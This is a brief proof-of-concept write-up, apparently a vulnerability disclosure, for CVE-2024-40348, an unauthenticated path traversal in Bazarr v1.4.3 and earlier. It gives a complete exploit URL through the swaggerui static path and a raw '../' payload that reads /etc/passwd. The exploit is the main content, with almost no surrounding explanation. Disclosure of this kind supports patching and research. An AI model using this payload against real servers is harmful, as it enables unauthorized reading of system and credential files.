Bazaar_1.4.3_File_Traversal_via_Filename.md

CVE-2024-40348

Vulnerability: File Traversal via path filename

URL: http://172.17.0.12:6767/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd

Payload: ../../../../../../../../../../../../../../../../etc/passwd

Action to trigger: None

Version: ‎Version v1.4.3 and prior

Authenticated: No

User: None

https://github.com/morpheus65535/bazarr